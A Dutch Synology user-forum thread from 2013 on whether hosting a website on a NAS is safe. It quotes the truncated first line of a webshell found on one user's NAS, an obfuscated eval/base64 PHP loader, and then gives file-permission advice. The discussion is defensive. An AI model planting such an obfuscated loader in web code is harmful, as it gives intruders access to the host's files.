Synology-Forum.nl

Overige software => Web Station => Topic gestart door: rjant2 op 19 februari 2013, 15:12:59

Titel: veiligheids risico's webserver op nas
Bericht door: rjant2 op 19 februari 2013, 15:12:59
Hallo,

Ik ben ondertussen een half jaartje in het bezit van een synology ds112+.
Ik wil de web server functie een gebruiken voor mijn site. ik vraag me alleen af wat de veiligheids risico's zijn op het moment dat ik een webserver start die van buiten de lan te bereiken is.
Als de site gehackt word kunnen mensen dan bij mijn andere bestanden op de nas ect..

Mijn vraag is dus hoe veilig is het, een website hosten op je nas?

Ik hoop dat jullie antwoord op mijn vraag kunnen geven,
alvast bedankt!
Titel: Re: veiligheids risico's webserver op nas
Bericht door: Matr1x op 19 februari 2013, 15:20:17
Zolang je alleen de poort voor je Web Server (en Photo Station) open zet, kunnen mensen niet zomaar bij je andere gegevens. Tenzij je natuurlijk exotische web pagina's hebt die dit juist wel toestaan.
Titel: Re: veiligheids risico's webserver op nas
Bericht door: rjant2 op 19 februari 2013, 15:29:00
Oke, bedankt voor de informatie!!, dan ga ik eens kijken of het mij lukt een webserver op te zetten!
Titel: Re: veiligheids risico's webserver op nas
Bericht door: nikilauda op 11 oktober 2013, 19:56:08
Zolang je alleen de poort voor je Web Server (en Photo Station) open zet, kunnen mensen niet zomaar bij je andere gegevens. Tenzij je natuurlijk exotische web pagina's hebt die dit juist wel toestaan.
Hoe kan er dan op mijn NAS plotseling een PHP bestand staan wat er van buitenaf is opgezet.
Hiermee kan men (proberen) de inhoud van de NAS bekijken. Enkele maanden geleden stond er ook zoiets op. je kon er door de gehele NAS bladeren.

Ik heb heel veel gezocht om dit te kunnen voorkomen.
Iemand ideeen???

Dit was het begin van het laatste php bestand
<title>IRCPlanet Upload</title> <?php eval(gzinflate(str_rot13(base64_decode('rUl6QttVEP58VfyHci
Titel: Re: veiligheids risico's webserver op nas
Bericht door: Birdy op 11 oktober 2013, 21:36:10
Citaat
Hoe kan er dan op mijn NAS plotseling een PHP bestand staan wat er van buitenaf is opgezet.
Een lek in je Website zelf misschien ?

Zo te zien komt dit van een gebruiker van KPN vandaan, maar goed, eigenlijk heb je niets aan die info :S
Titel: Re: veiligheids risico's webserver op nas
Bericht door: Grofweg op 11 oktober 2013, 22:01:21
Zolang je alleen de poort voor je Web Server (en Photo Station) open zet, kunnen mensen niet zomaar bij je andere gegevens. Tenzij je natuurlijk exotische web pagina's hebt die dit juist wel toestaan.
Hoe kan er dan op mijn NAS plotseling een PHP bestand staan wat er van buitenaf is opgezet.
Hiermee kan men (proberen) de inhoud van de NAS bekijken. Enkele maanden geleden stond er ook zoiets op. je kon er door de gehele NAS bladeren.

Ik heb heel veel gezocht om dit te kunnen voorkomen.
Iemand ideeen???

Dit was het begin van het laatste php bestand
<title>IRCPlanet Upload</title> <?php eval(gzinflate(str_rot13(base64_decode('rUl6QttVEP58VfyHci

Wat voor een website heb je draaien, WordPress of Joomla? Vaak is dit het gevolg van onjuiste rechteninstelling. Het kan geen kwaad om die zeker even na te lopen.
Wordpress info: http://codex.wordpress.org/Changing_File_Permissions (http://codex.wordpress.org/Changing_File_Permissions)
Joomla info: http://docs.joomla.org/Verifying_permissions (http://docs.joomla.org/Verifying_permissions)
Titel: Re: veiligheids risico's webserver op nas
Bericht door: nikilauda op 12 oktober 2013, 13:28:09
Het is een website waar geen CMS op draait maar een in PHP geschreven  logger voor mijn zonnepanelen.
Titel: Re: veiligheids risico's webserver op nas
Bericht door: Grofweg op 14 oktober 2013, 17:21:20
Het is een website waar geen CMS op draait maar een in PHP geschreven  logger voor mijn zonnepanelen.

Controleer dan bv met Filezilla wat de rechten zij  per bestand en map.
Zet alle mappen minimaal op 755 en alle bestanden op 644.
Titel: Re: veiligheids risico's webserver op nas
Bericht door: fred54 op 14 oktober 2013, 17:54:44
Wat bedoel je met:
Zet alle mappen minimaal op 755 en alle bestanden op 644. ?

En een website kan met html geschreven zijn, wat geldt hiervvor?
Titel: Re: veiligheids risico's webserver op nas
Bericht door: Grofweg op 14 oktober 2013, 20:33:07
Wat bedoel je met:
Zet alle mappen minimaal op 755 en alle bestanden op 644. ?

Hier  (https://www.xs4all.nl/klant/helpdesk/website/advancedunix/chmod/) vind je daar een aardige uitleg over.

En een website kan met html geschreven zijn, wat geldt hiervvor?

Dit is een bestand, dus daar geldt het zelfde voor als voor php-bestanden.